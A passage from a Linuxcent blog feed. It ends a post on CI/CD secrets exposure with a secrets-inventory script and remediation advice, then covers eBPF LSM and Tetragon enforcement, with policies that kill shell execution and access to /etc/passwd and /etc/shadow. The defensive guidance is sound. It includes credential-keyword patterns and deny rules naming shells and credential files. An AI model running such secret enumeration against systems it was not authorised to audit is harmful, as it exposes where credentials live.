if command -v kubectl &gt; /dev/null 2&gt;&amp;1; then
  kubectl get pods -A -o json 2&gt;/dev/null | \
    jq -r &#039;.items[] | 
      .metadata.namespace + &quot;/&quot; + .metadata.name + &quot;: &quot; + 
      ([.spec.containers[].env[]? | 
        select(.name | test(&quot;KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL&quot;; &quot;i&quot;)) |
        .name
      ] | join(&quot;, &quot;))&#039; | \
    grep -v &quot;: $&quot; | head -20
else
  echo &quot;  kubectl not found&quot;
fi

echo &quot;&quot;
echo &quot;=== 4. GitHub Actions Secrets Inventory ===&quot;
if [ -n &quot;${GITHUB_TOKEN}&quot; ]; then
  REPO=&quot;your-org/your-repo&quot;  # Update this
  curl -s -H &quot;Authorization: Bearer ${GITHUB_TOKEN}&quot; \
    -H &quot;Accept: application/vnd.github+json&quot; \
    &quot;https://api.github.com/repos/${REPO}/actions/secrets&quot; | \
    jq &#039;.secrets[] | {name: .name, updated: .updated_at}&#039;
else
  echo &quot;  Set GITHUB_TOKEN to enumerate repository secrets&quot;
fi
</code></pre>
<hr />
<h2 id="common-mistakes-when-addressing-cicd-secrets-exposure"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Common Mistakes When Addressing CI/CD Secrets Exposure</h2>
<p><strong>Treating secret scanning as the primary control.</strong> TruffleHog and Gitleaks catch what gets committed. They do not prevent the CircleCI attack class — an attacker who compromises the CI/CD platform itself bypasses all scanning controls. Scanning is detection; OIDC workload identity is prevention.</p>
<p><strong>Rotating compromised keys without checking CloudTrail for use.</strong> When a secret is exposed, the first question is not &#8220;rotate it&#8221; — it is &#8220;was it used?&#8221; Check CloudTrail for any API activity from the key between the suspected exposure time and the rotation. If the key was used, you have an active incident, not just a credential rotation task.</p>
<p><strong>Using OIDC trust policies that are too broad.</strong> The GitHub Actions OIDC trust policy in the fix section uses a <code class="" data-line="">StringLike</code> condition on the <code class="" data-line="">sub</code> claim to scope to a specific repository and branch. If you use <code class="" data-line="">StringLike: &quot;*&quot;</code> instead, any GitHub Actions job in any repository can assume your role. Always scope OIDC trust policies to the specific repository, branch, and environment that needs the access.</p>
<p><strong>Not scanning git history — only the working tree.</strong> Secrets that were committed and then deleted are still in git history. <code class="" data-line="">git rm</code> removes the file from the working tree but not from the object store. TruffleHog and Gitleaks scan history by default when given the <code class="" data-line="">--all</code> flag. Scanning only the current working tree misses all historical exposures.</p>
<p><strong>Forgetting third-party GitHub Actions.</strong> The supply chain attack surface includes the Actions you reference in your workflows. An Action pinned to a mutable tag (<code class="" data-line="">@main</code>, <code class="" data-line="">@v1</code>) can be changed by the maintainer. Pin to a specific commit SHA and verify the Action&#8217;s provenance.</p>
<pre><code class="" data-line=""># Vulnerable: mutable tag
- uses: aws-actions/configure-aws-credentials@v4

# Secure: pinned SHA
- uses: aws-actions/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e831c1e4c763fe4
</code></pre>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>Secret Storage Pattern</th>
<th>Risk Level</th>
<th>Structural Fix</th>
</tr>
</thead>
<tbody>
<tr>
<td>.env file committed to public repo</td>
<td>Critical</td>
<td>Pre-commit hook + OIDC</td>
</tr>
<tr>
<td>.env file committed to private repo</td>
<td>High</td>
<td>Git history purge + pre-commit hook + OIDC</td>
</tr>
<tr>
<td>Long-lived key in CI/CD env var</td>
<td>High</td>
<td>OIDC workload identity</td>
</tr>
<tr>
<td>Long-lived key in K8s Secret</td>
<td>High</td>
<td>Pod identity / IRSA / Workload Identity</td>
</tr>
<tr>
<td>Secret in build log output</td>
<td>Medium</td>
<td>Mask secrets in CI configuration</td>
</tr>
<tr>
<td>Secret in container env var</td>
<td>Medium</td>
<td>Vault agent / CSI secrets driver</td>
</tr>
<tr>
<td>Key referenced via AWS Secrets Manager</td>
<td>Low (if scoped)</td>
<td>Use for remaining static secrets</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li><strong>CI/CD secrets exposure</strong> is structural: long-lived credentials in a CI/CD platform are only as secure as that platform — the CircleCI breach proved that encryption alone is insufficient if the attacker can access the keys</li>
<li>Automated secret scanners find publicly committed credentials within 60–90 seconds — rotation must happen faster than that or assume compromise</li>
<li>Pre-commit hooks and CI secret scanning catch accidents; they do not prevent determined attackers who compromise the platform itself</li>
<li><a href="/oidc-workload-identity-eliminate-cloud-access-keys/">OIDC workload identity</a> is the structural fix: no stored credential means no credential to exfiltrate</li>
<li>When rotating a compromised key, check CloudTrail for usage between exposure and rotation before closing the incident</li>
<li>OIDC trust policies must be scoped to specific repositories and branches — a wildcard trust policy recreates the exposure in a different form</li>
<li>Pin third-party GitHub Actions to commit SHAs, not mutable tags — mutable tags are a supply chain attack surface</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>EP07 covers SSRF to cloud metadata: how an SSRF vulnerability in any application layer becomes a straight line to IAM credentials when IMDSv2 is not enforced. The Capital One breach anatomy — WAF SSRF → EC2 metadata → IAM role credentials → 100 million S3 records — in full technical detail, with the simulation commands and the one-line enforcement fix. If you&#8217;ve addressed identity and secrets, the network attack paths are where EP07 through EP10 focus.</p>
<p>Get EP07 in your inbox when it publishes → <a href="#subscribe">subscribe at linuxcent.com</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fcicd-secrets-exposure-supply-chain%2F&amp;linkname=CI%2FCD%20Secrets%20Exposure%3A%20How%20Supply%20Chain%20Attacks%20Target%20Your%20Pipeline" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fcicd-secrets-exposure-supply-chain%2F&amp;linkname=CI%2FCD%20Secrets%20Exposure%3A%20How%20Supply%20Chain%20Attacks%20Target%20Your%20Pipeline" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fcicd-secrets-exposure-supply-chain%2F&amp;linkname=CI%2FCD%20Secrets%20Exposure%3A%20How%20Supply%20Chain%20Attacks%20Target%20Your%20Pipeline" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fcicd-secrets-exposure-supply-chain%2F&amp;linkname=CI%2FCD%20Secrets%20Exposure%3A%20How%20Supply%20Chain%20Attacks%20Target%20Your%20Pipeline" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fcicd-secrets-exposure-supply-chain%2F&amp;linkname=CI%2FCD%20Secrets%20Exposure%3A%20How%20Supply%20Chain%20Attacks%20Target%20Your%20Pipeline" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fcicd-secrets-exposure-supply-chain%2F&amp;linkname=CI%2FCD%20Secrets%20Exposure%3A%20How%20Supply%20Chain%20Attacks%20Target%20Your%20Pipeline" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fcicd-secrets-exposure-supply-chain%2F&amp;linkname=CI%2FCD%20Secrets%20Exposure%3A%20How%20Supply%20Chain%20Attacks%20Target%20Your%20Pipeline" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fcicd-secrets-exposure-supply-chain%2F&#038;title=CI%2FCD%20Secrets%20Exposure%3A%20How%20Supply%20Chain%20Attacks%20Target%20Your%20Pipeline" data-a2a-url="https://linuxcent.com/cicd-secrets-exposure-supply-chain/" data-a2a-title="CI/CD Secrets Exposure: How Supply Chain Attacks Target Your Pipeline"></a></p><p>The post <a href="https://linuxcent.com/cicd-secrets-exposure-supply-chain/">CI/CD Secrets Exposure: How Supply Chain Attacks Target Your Pipeline</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/cicd-secrets-exposure-supply-chain/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1858</post-id>	</item>
		<item>
		<title>LSM and Tetragon — When the Kernel Says No</title>
		<link>https://linuxcent.com/ebpf-lsm-tetragon-runtime-security/</link>
					<comments>https://linuxcent.com/ebpf-lsm-tetragon-runtime-security/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Fri, 12 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[eBPF]]></category>
		<category><![CDATA[Cilium]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[linux-security]]></category>
		<category><![CDATA[LSM]]></category>
		<category><![CDATA[Runtime Security]]></category>
		<category><![CDATA[SRE]]></category>
		<category><![CDATA[Tetragon]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1841</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span>LSM hooks with eBPF enforce security policy at the syscall boundary before the operation completes. How Tetragon kills processes from kernel space and why that difference matters.</p>
<p>The post <a href="https://linuxcent.com/ebpf-lsm-tetragon-runtime-security/">LSM and Tetragon — When the Kernel Says No</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=code?code.innerText:pre.innerText;
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>eBPF: From Kernel to Cloud, Episode 12</em><br />
<a href="/what-is-ebpf/">What Is eBPF?</a> · <a href="/ebpf-verifier-safety/">The BPF Verifier</a> · <a href="/ebpf-vs-kernel-modules/">eBPF vs Kernel Modules</a> · <a href="/ebpf-program-types/">eBPF Program Types</a> · <a href="/ebpf-maps-persistent-data/">eBPF Maps</a> · <a href="/co-re-libbpf-write-once/">CO-RE and libbpf</a> · <a href="/xdp-network-fast-path/">XDP</a> · <a href="/tc-ebpf-pod-network-policy/">TC eBPF</a> · <a href="/bpftrace-kernel-observability/">bpftrace</a> · <a href="/network-flow-observability-ebpf/">Network Flow Observability</a> · <a href="/dns-kernel-observability/">DNS Observability</a> · <strong>LSM and Tetragon</strong></p>
<hr />
<p style="font-size:0.72em;font-weight:700;letter-spacing:0.12em;color:#f59e0b;text-transform:uppercase;margin:2em 0 0.75em 0;text-align:center;">Architecture Overview</p>
<figure class="wp-block-image size-full" style="margin:0 0 0.5em 0;">
<img decoding="async" width="2400" height="1578" src="https://linuxcent.com/wp-content/uploads/2026/05/ep12-lsm-tetragon-og-2.png" alt="LSM BPF and Tetragon — kernel security enforcement architecture showing syscall interception and policy evaluation" class="wp-image-2121" style="width:100%;height:auto;display:block;border-radius:8px;" srcset="https://linuxcent.com/wp-content/uploads/2026/05/ep12-lsm-tetragon-og-2.png 2400w, https://linuxcent.com/wp-content/uploads/2026/05/ep12-lsm-tetragon-og-2-300x197.png 300w, https://linuxcent.com/wp-content/uploads/2026/05/ep12-lsm-tetragon-og-2-1024x673.png 1024w, https://linuxcent.com/wp-content/uploads/2026/05/ep12-lsm-tetragon-og-2-768x505.png 768w, https://linuxcent.com/wp-content/uploads/2026/05/ep12-lsm-tetragon-og-2-1536x1010.png 1536w, https://linuxcent.com/wp-content/uploads/2026/05/ep12-lsm-tetragon-og-2-2048x1347.png 2048w" sizes="(max-width: 2400px) 100vw, 2400px" /><figcaption style="text-align:center;font-size:0.85em;color:#6b7280;margin-top:0.75em;">LSM BPF hooks fire before every sensitive syscall — Tetragon uses them to enforce and kill, not just observe.</figcaption></figure>
<hr style="border:none;border-top:1px solid #e5e7eb;margin:0.5em 0 2em 0;"/>
<h2 id="tldr">TL;DR</h2>
<ul>
<li>LSM eBPF Tetragon integrates Linux Security Module hooks with eBPF programs — enforcement happens at the syscall boundary, before the operation completes, with no detect-and-respond window<br />
  <em>(LSM hook = Linux Security Module hook: a callback point built into the kernel that fires before a security-relevant operation completes, allowing the security module to approve or reject it)</em></li>
<li>Falco and similar sidecar-based tools detect after the fact — the syscall returns, the file is written, the connection is established, the alert fires; with LSM, the syscall never returns success</li>
<li><code class="" data-line="">BPF_PROG_TYPE_LSM</code> is the eBPF program type that attaches to LSM hooks — introduced in kernel 5.7, stable in 5.10+; available on all current Ubuntu LTS, Fedora, and EKS/GKE nodes</li>
<li>Tetragon attaches eBPF programs to LSM hooks and kprobes simultaneously — observing and enforcing from the same kernel attachment point</li>
<li>Tetragon&#8217;s enforcement sends <code class="" data-line="">SIGKILL</code> from within the kernel context — not from a userspace agent reading an audit log and then killing the process</li>
<li>Production caution: LSM enforce mode without thorough policy testing in audit mode first will kill legitimate workloads; always audit before enforce</li>
</ul>
<hr />
<p>EP11 showed how to observe DNS queries at the kernel level — seeing what a workload resolves before it establishes a connection. But observation is passive. It tells you what happened. LSM eBPF Tetragon changes the question entirely: instead of watching the workload, the kernel refuses the operation. This episode covers how that enforcement layer works and why the difference between &#8220;detect&#8221; and &#8220;prevent&#8221; matters in runtime security.</p>
<h2 id="quick-check-is-your-cluster-running-lsm-based-enforcement">Quick Check: Is Your Cluster Running LSM-Based Enforcement?</h2>
<pre><code class="" data-line=""># On any cluster node — what security modules are active?
cat /sys/kernel/security/lsm

# Expected output on a modern kernel:
# lockdown,capability,landlock,yama,apparmor,bpf
#                                              ^^^
#                            &quot;bpf&quot; here means BPF LSM is enabled
</code></pre>
<pre><code class="" data-line=""># Is Tetragon running on this cluster?
kubectl get pods -n kube-system -l app.kubernetes.io/name=tetragon

# If Tetragon is present, check what TracingPolicies are enforcing:
kubectl get tracingpolicies -A

# Sample output:
# NAMESPACE    NAME                      AGE
# kube-system  block-privileged-exec     3d
# kube-system  restrict-sensitive-paths  3d
</code></pre>
<pre><code class="" data-line=""># See what eBPF programs Tetragon has loaded
bpftool prog list | grep -i tetragon

# Output sample:
# 89: lsm  name tetragon_lsm_bprm  tag 8f2a1c3e4d5b7a9f  gpl
#     loaded_at 2026-04-22T09:13:45+0530  uid 0
#     xlated 3312B  jited 2184B  memlock 8192B
# 91: kprobe  name tetragon_kp_exec tag 3c1d8e2f7a4b5c9d  gpl
</code></pre>
<p><code class="" data-line="">lsm</code> program type confirms LSM hook attachment. If you see <code class="" data-line="">tetragon_lsm_*</code> entries, Tetragon is enforcing at the kernel level on this node.</p>
<blockquote>
<p><strong>Not running Tetragon?</strong> Check if your cluster uses AppArmor or seccomp profiles instead — <code class="" data-line="">kubectl get pod &lt;name&gt; -o jsonpath=&#039;{.metadata.annotations}&#039;</code> and look for <code class="" data-line="">seccomp.security.alpha.kubernetes.io</code> or <code class="" data-line="">container.apparmor.security.beta.kubernetes.io</code> annotations. These are userspace-applied profiles that the kernel enforces. Tetragon is additive — it can run alongside AppArmor/seccomp and provides per-process, dynamic policy that static profiles cannot.</p>
</blockquote>
<hr />
<p>Falco fired at 03:14 AM. The alert: a process inside a production container had opened <code class="" data-line="">/etc/passwd</code> for writing. By the time I was on the call, the container had been restarted by a health check failure — the compromised process had already exited. The file had already been modified. Falco had detected the open, emitted the alert, and by the time any automated response could have acted, the syscall had returned, the write had completed, and the file was changed.</p>
<p>Falco did exactly what it&#8217;s designed to do: observe and alert. The gap isn&#8217;t in Falco — it&#8217;s in the architecture. When a tool detects from userspace by reading kernel audit events, there is always a window between the operation completing and the alert firing. For a fast exploit, that window is the entire attack.</p>
<p>I added a Tetragon TracingPolicy the following week:</p>
<pre><code class="" data-line="">spec:
  kprobes:
    - call: &quot;security_inode_permission&quot;
      syscall: false
      return: false
      args:
        - index: 0
          type: &quot;inode&quot;
      selectors:
        - matchArgs:
            - index: 0
              operator: &quot;Prefix&quot;
              values: [&quot;/etc/passwd&quot;, &quot;/etc/shadow&quot;]
          matchActions:
            - action: Sigkill
</code></pre>
<p>Next time a process tries to open <code class="" data-line="">/etc/passwd</code> for writing in a container covered by that policy, the kernel sends <code class="" data-line="">SIGKILL</code> from within the LSM hook. The open never completes. There is no window.</p>
<hr />
<h2 id="how-lsm-hooks-are-placed-in-the-kernel">How LSM Hooks Are Placed in the Kernel</h2>
<p>Linux Security Modules (LSM) is a framework built into the Linux kernel that inserts hook points before security-sensitive operations. The hook fires before the operation is allowed to complete — the LSM module can return an error code that causes the kernel to reject the operation and return <code class="" data-line="">-EPERM</code> to the calling process.</p>
<pre><code class="" data-line="">Process calls open(&quot;/etc/passwd&quot;, O_WRONLY)
      ↓
VFS (Virtual Filesystem) layer receives the request
      ↓
VFS calls security_inode_permission()   ← LSM hook fires here
      ↓
LSM module checks policy
      ↓
      ├── ALLOW → open() proceeds, file descriptor returned
      └── DENY  → open() returns -EPERM, process gets &quot;Permission denied&quot;
                  File is never touched
</code></pre>
<blockquote>
<p><strong><code class="" data-line="">LSM hook</code></strong> — a callback point embedded in Linux kernel source at every security-sensitive operation: file open, execute, socket connect, capability check, mount, ptrace, and more. The kernel calls registered LSM modules at each hook. Before BPF LSM (kernel 5.7), only statically compiled security modules (SELinux, AppArmor, BPF LSM itself) could register at these hooks.</p>
<p><strong><code class="" data-line="">BPF_PROG_TYPE_LSM</code></strong> — the eBPF program type that attaches to LSM hooks. Introduced in kernel 5.7. Requires BPF LSM to be enabled in the kernel (<code class="" data-line="">lsm=bpf</code> in kernel command line, or present alongside other LSMs). When this program type is loaded and attached to an LSM hook, the eBPF program runs at the hook point and returns 0 (allow) or a negative error code (deny).</p>
</blockquote>
<p>The full list of LSM hooks:</p>
<pre><code class="" data-line=""># All LSM hook points available for eBPF attachment
bpftool feature list | grep lsm_hook | head -20

# Or browse the kernel source list:
# include/linux/security.h — every security_*() function is an LSM hook point
</code></pre>
<p>There are 200+ LSM hook points. The most operationally relevant for container security:</p>
<table>
<thead>
<tr>
<th>LSM Hook</th>
<th>What it guards</th>
</tr>
</thead>
<tbody>
<tr>
<td><code class="" data-line="">security_bprm_check</code></td>
<td>Process execution (execve)</td>
</tr>
<tr>
<td><code class="" data-line="">security_inode_permission</code></td>
<td>File read/write/execute</td>
</tr>
<tr>
<td><code class="" data-line="">security_inode_create</code></td>
<td>File creation</td>
</tr>
<tr>
<td><code class="" data-line="">security_socket_connect</code></td>
<td>Outbound TCP/UDP connect</td>
</tr>
<tr>
<td><code class="" data-line="">security_socket_bind</code></td>
<td>Port binding</td>
</tr>
<tr>
<td><code class="" data-line="">security_ptrace_access_check</code></td>
<td>ptrace (debugger attach)</td>
</tr>
<tr>
<td><code class="" data-line="">security_capable</code></td>
<td>Capability checks (CAP_SYS_ADMIN etc.)</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="how-tetragon-combines-lsm-and-kprobe">How Tetragon Combines LSM and kprobe</h2>
<p>Tetragon attaches two types of programs simultaneously for comprehensive runtime security:</p>
<pre><code class="" data-line="">kprobe programs          LSM programs
(observation layer)      (enforcement layer)
       │                        │
       ↓                        ↓
Process executes              Kernel LSM hook fires
kernel function               BEFORE operation completes
       │                        │
       ↓                        ↓
Tetragon reads context:       Tetragon checks TracingPolicy:
  - process name                - selectors match?
  - PID, UID                    - action = Sigkill?
  - namespace, pod name         │
  - parent process              ↓
  - capabilities                SIGKILL sent from kernel context
       │                        Process terminated
       ↓                        Operation never completes
Tetragon exports event
  to userspace observer
</code></pre>
<p>The kprobe side provides the rich context (pod name, namespace, process tree) because it has access to Kubernetes metadata that Tetragon&#8217;s userspace component has pre-populated into maps. The LSM side provides the enforcement capability. Together, they give you context-aware kernel enforcement.</p>
<blockquote>
<p><strong><code class="" data-line="">SIGKILL</code> from kernel vs userspace kill</strong> — When a userspace process runs <code class="" data-line="">kill -9 &lt;pid&gt;</code>, it issues a kill syscall, the kernel schedules the signal delivery, and the target process dies on its next scheduler timeslice. There is a measurable delay — and more importantly, the target process may run for several more instructions before the signal is delivered. When a BPF LSM program returns a non-zero error code or calls <code class="" data-line="">bpf_send_signal(SIGKILL)</code> from within the hook, the signal is delivered synchronously within the kernel&#8217;s execution context. The process does not execute another instruction in the problematic syscall. This is not a speed difference — it is a structural difference in when the enforcement happens relative to the operation.</p>
</blockquote>
<hr />
<h2 id="writing-a-tetragon-tracingpolicy-for-enforcement">Writing a Tetragon TracingPolicy for Enforcement</h2>
<p>Tetragon policies are Kubernetes custom resources. Here&#8217;s a policy that prevents any container from executing shells:</p>
<pre><code class="" data-line="">apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: block-shell-exec
spec:
  kprobes:
    - call: &quot;security_bprm_check&quot;
      syscall: false
      args:
        - index: 0
          type: &quot;linux_binprm&quot;
      selectors:
        - matchBinaries:
            - operator: &quot;In&quot;
              values:
                - &quot;/bin/sh&quot;
                - &quot;/bin/bash&quot;
                - &quot;/bin/dash&quot;
                - &quot;/usr/bin/sh&quot;
                - &quot;/usr/bin/bash&quot;
          matchNamespaces:
            - namespace: Pid
              operator: &quot;NotIn&quot;
              values: [&quot;1&quot;]      # exclude host namespace (PID 1 = init)
          matchActions:
            - action: Sigkill
              argError: -1       # EPERM returned to the caller
</code></pre>
<p>Apply and verify:</p>
<pre><code class="" data-line="">kubectl apply -f block-shell-exec.yaml

# Confirm it&#039;s active
kubectl get tracingpolicies
# NAME               ENABLED   REASON   AGE
# block-shell-exec   true               5s

# Verify Tetragon loaded the eBPF program for this policy
bpftool prog list | grep bprm
# 94: lsm  name tetragon_lsm_bprm  tag 8f2a1c3e4d5b7a9f  gpl
#     loaded_at 2026-04-22T14:22:13+0530  uid 0
</code></pre>
<p>Test it (in a non-production namespace):</p>
<pre><code class="" data-line="">kubectl exec -it test-pod -- /bin/sh

# Expected output:
# OCI runtime exec failed: exec failed: unable to start container process:
# error during container init: error starting executable [&quot;/bin/sh&quot;]:
# container_linux.go: ... starting container process caused: process_linux.go:
# ... SIGKILL
</code></pre>
<p>The shell never started. The <code class="" data-line="">security_bprm_check</code> LSM hook fired, the Tetragon eBPF program evaluated the policy, returned <code class="" data-line="">SIGKILL</code> from kernel space. The exec system call returned <code class="" data-line="">-EPERM</code> to the container runtime. No shell process was created.</p>
<hr />
<h2 id="audit-mode-before-enforce-mode">Audit Mode Before Enforce Mode</h2>
<p>Running a new LSM policy in enforce mode without prior testing will kill legitimate workloads. Tetragon supports audit mode for every policy:</p>
<pre><code class="" data-line="">          matchActions:
            - action: Post     # audit mode: log event, do NOT kill
</code></pre>
<p><code class="" data-line="">Post</code> emits a Tetragon event that you can observe:</p>
<pre><code class="" data-line=""># Watch audit events for the policy (before switching to Sigkill)
kubectl exec -n kube-system -it \
  $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_KPROBE | grep bprm
</code></pre>
<p>Sample audit event:</p>
<pre><code class="" data-line="">{
  &quot;process_kprobe&quot;: {
    &quot;process&quot;: {
      &quot;pod&quot;: {&quot;name&quot;: &quot;my-app-6d4f9-xk2p1&quot;, &quot;namespace&quot;: &quot;production&quot;},
      &quot;binary&quot;: &quot;/bin/sh&quot;,
      &quot;pid&quot;: 18293
    },
    &quot;function_name&quot;: &quot;security_bprm_check&quot;,
    &quot;action&quot;: &quot;KPROBE_ACTION_POST&quot;
  }
}
</code></pre>
<p>If <code class="" data-line="">my-app</code> legitimately needs <code class="" data-line="">/bin/sh</code> for its health check script, you&#8217;ll see it here before you kill it. Refine the selector (add <code class="" data-line="">matchLabels</code> to exclude that specific deployment, or add the binary to an allowlist) and then switch to <code class="" data-line="">Sigkill</code>.</p>
<hr />
<h2 id="production-gotchas"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Production Gotchas</h2>
<p><strong>Enforce mode kills anything the selector matches — including health checks and init containers.</strong> Most production containers have some shell usage: liveness probes that run <code class="" data-line="">sh -c</code>, init containers that <code class="" data-line="">chmod</code> files, entrypoint wrappers. Run in <code class="" data-line="">Post</code> (audit) mode for at least 48 hours across a representative workload set before switching to <code class="" data-line="">Sigkill</code>. Track all matched events and understand every process in the trace before enforcing.</p>
<p><strong>LSM hooks fire in kernel context — eBPF program complexity is limited.</strong> The verifier enforces strict limits on LSM programs because they run synchronously in the kernel&#8217;s hot path. Policies with many conditions or complex map lookups may be rejected by the verifier. Tetragon&#8217;s policy engine compiles your TracingPolicy into eBPF that stays within verifier limits, but very complex <code class="" data-line="">matchArgs</code> chains with many values can hit limits. Test with <code class="" data-line="">kubectl apply</code> and check Tetragon pod logs for verifier rejection messages.</p>
<p><strong><code class="" data-line="">BPF_PROG_TYPE_LSM</code> requires kernel 5.7+ and BPF LSM enabled.</strong> Check <code class="" data-line="">/sys/kernel/security/lsm</code> for <code class="" data-line="">bpf</code> in the list. EKS nodes running Amazon Linux 2 with kernel 5.10+ have BPF LSM available. GKE nodes with kernel 5.10+ on Container-Optimized OS have it enabled. Ubuntu 22.04 (kernel 5.15) has it enabled by default. Ubuntu 20.04 kernels before 5.7 do not — check your actual kernel version.</p>
<p><strong>Policy scope: Tetragon TracingPolicies are cluster-wide by default.</strong> A policy without a <code class="" data-line="">matchNamespaces</code> or <code class="" data-line="">matchLabels</code> selector applies to every pod on every node. Start with namespace-scoped policies during testing. Use <code class="" data-line="">namespaced</code> TracingPolicy resources (Tetragon 0.10+) to limit scope to a specific namespace.</p>
